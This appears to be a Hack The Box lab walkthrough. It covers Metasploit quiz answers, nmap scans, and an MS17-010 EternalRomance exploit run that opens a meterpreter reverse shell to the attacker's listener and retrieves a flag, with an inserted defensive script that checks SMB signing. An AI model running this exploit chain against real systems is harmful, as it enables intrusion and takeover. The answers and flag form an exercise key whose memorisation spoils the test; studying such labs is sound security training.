USING THE METASPLOIT FRAMEWORK

INTRODUCTION TO METASPLOIT

Which version of Metasploit comes equipped with a GUI interface?
metasploit pro

What command do you use to interact with the free version of Metasploit?
msfconsole

MODULES

Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer.
root@htb:~$ sudo nmap -sS -sV -T4 10.129.127.100 -p- -oA targetServices
 PORT      STATE SERVICE      VERSION
 80/tcp    open  http         Microsoft IIS httpd 10.0
 135/tcp   open  msrpc        Microsoft Windows RPC
 139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
 445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
 5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 49664/tcp open  msrpc        Microsoft Windows RPC
 49665/tcp open  msrpc        Microsoft Windows RPC
 49666/tcp open  msrpc        Microsoft Windows RPC
 49667/tcp open  msrpc        Microsoft Windows RPC
 49668/tcp open  msrpc        Microsoft Windows RPC
 49669/tcp open  msrpc        Microsoft Windows RPC
 49670/tcp open  msrpc        Microsoft Windows RPC
 Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

root@htb:~$ sudo nmap -sV -sC -T4 10.129.127.100 -p 80,135,139,445,5985,47001,49664-49670 -oA targetServiceDefaultScripts
 PORT      STATE SERVICE      VERSION
 80/tcp    open  http         Microsoft IIS httpd 10.0
 |_http-title: 10.129.127.100 - /
 | http-methods: 
 |_  Potentially risky methods: TRACE
 |_http-server-header: Microsoft-IIS/10.0
 135/tcp   open  msrpc        Microsoft Windows RPC
 139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
 445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
 5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 |_http-title: Not Found
 |_http-server-header: Microsoft-HTTPAPI/2.0
 47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 |_http-title: Not Found
 |_http-server-header: Microsoft-HTTPAPI/2.0
 49664/tcp open  msrpc        Microsoft Windows RPC
 49665/tcp open  msrpc        Microsoft Windows RPC
 49666/tcp open  msrpc        Microsoft Windows RPC
 49667/tcp open  msrpc        Microsoft Windows RPC
 49668/tcp open  msrpc        Microsoft Windows RPC
 49669/tcp open  msrpc        Microsoft Windows RPC
 49670/tcp open  msrpc        Microsoft Windows RPC
 Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

 Host script results:
 |_clock-skew: mean: 2h40m01s, deviation: 4h37m10s, median: 0s
 | smb2-time: 
 |   date: 2025-12-08T15:39:42
 |_  start_date: 2025-12-08T15:29:23
 | smb-os-discovery: 
 |   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
 |   Computer name: MSF1-WIN01
 |   NetBIOS computer name: MSF1-WIN01\x00
 |   Workgroup: WORKGROUP\x00
 |_  System time: 2025-12-08T07:39:46-08:00
 | smb-security-mode: 
 |   account_used: guest
 |   authentication_level: user
 |   challenge_response: supported
 |_  message_signing: disabled (dangerous, but default)
 | smb2-security-mode: 
 |   3:1:1: 
 |_    Message signing enabled but not required 
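
A defender's triage of the SMB findings above, as an added example that is not part of the original notes: it parses nmap's text output for the OS and SMB signing lines and lists the hardening gaps they imply (script and sample input are constructed here, modelled on the scan output).

```python
import re
from dataclasses import dataclass, field

# Constructed nmap normal-output excerpt, modelled on the host-script
# section of the scan above (sample input, not copied from the page).
SAMPLE_NMAP = """\
Host script results:
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: MSF1-WIN01
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
"""

@dataclass
class SmbPosture:
    os_banner: str = ""
    smb1_signing: str = ""      # nmap reports disabled / supported / required
    smb2_signing: str = ""
    smb1_negotiated: bool = False
    issues: list = field(default_factory=list)

def assess_smb_posture(text: str) -> SmbPosture:
    """Pull SMB facts out of nmap's text output and list hardening gaps."""
    p = SmbPosture()
    if m := re.search(r"^\|\s+OS:\s*(.+)$", text, re.M):
        p.os_banner = m.group(1).strip()
    # smb-security-mode only reports when an SMBv1 dialect was negotiated,
    # so its presence is evidence that SMBv1 is still enabled on the host.
    if m := re.search(r"message_signing:\s*(\w+)", text):
        p.smb1_signing, p.smb1_negotiated = m.group(1), True
    if m := re.search(r"Message signing (enabled but not required|enabled and required|disabled)", text):
        p.smb2_signing = m.group(1)
    if p.smb1_negotiated:
        p.issues.append("SMBv1 enabled: MS17-010 attack surface; disable SMBv1 and verify patch level")
    if p.smb1_signing and p.smb1_signing != "required":
        p.issues.append("SMBv1 signing not required: relay/tampering risk")
    if p.smb2_signing and p.smb2_signing != "enabled and required":
        p.issues.append("SMBv2/3 signing not required: relay/tampering risk")
    return p

if __name__ == "__main__":
    for issue in assess_smb_posture(SAMPLE_NMAP).issues:
        print("[!]", issue)
```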

root@htb:~$ msfconsole
msf6> search eternalromance
 Matching Modules
 ================

    #   Name                                  Disclosure Date  Rank    Check  Description
    -   ----                                  ---------------  ----    -----  -----------
    0   exploit/windows/smb/ms17_010_psexec   2017-03-14       normal  Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
    1     \_ target: Automatic                .                .       .      .
    2     \_ target: PowerShell               .                .       .      .
    3     \_ target: Native upload            .                .       .      .
    4     \_ target: MOF upload               .                .       .      .
    5     \_ AKA: ETERNALSYNERGY              .                .       .      .
    6     \_ AKA: ETERNALROMANCE              .                .       .      .
    7     \_ AKA: ETERNALCHAMPION             .                .       .      .
    8     \_ AKA: ETERNALBLUE                 .                .       .      .

msf6> use 0
 [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6> show options
 ...
msf6> set RHOSTS 10.129.127.100 
 RHOSTS => 10.129.127.100
msf6> set LHOST 10.10.15.99
 LHOST => 10.10.15.99
msf6> exploit
 [*] Started reverse TCP handler on 10.10.15.99:4444 
 [*] 10.129.127.100:445 - Target OS: Windows Server 2016 Standard 14393
 [*] 10.129.127.100:445 - Built a write-what-where primitive...
 [+] 10.129.127.100:445 - Overwrite complete... SYSTEM session obtained!
 [*] 10.129.127.100:445 - Selecting PowerShell target
 [*] 10.129.127.100:445 - Executing the payload...
 [+] 10.129.127.100:445 - Service start timed out, OK if running a command or non-service executable...
 [*] Sending stage (177734 bytes) to 10.129.127.100
 [*] Meterpreter session 1 opened (10.10.15.99:4444 -> 10.129.127.100:49671) at 2025-12-08 09:57:26 -0600

(Meterpreter 1)(C:\Windows\system32) > shell
 Process 804 created.
 Channel 1 created.
 Microsoft Windows [Version 10.0.14393]
 (c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> findstr /i /s "flag.txt" c:\*
 C:\Users\Administrator\Desktop\flag.txt

 * /i - Case-insensitive search.
 * /s - Searches the specified directory and all of its subdirectories.

C:\Windows\system32> type c:\Users\Administrator\Desktop\flag.txt
 HTB{MSF-W1nD0w5-3xPL01t4t10n}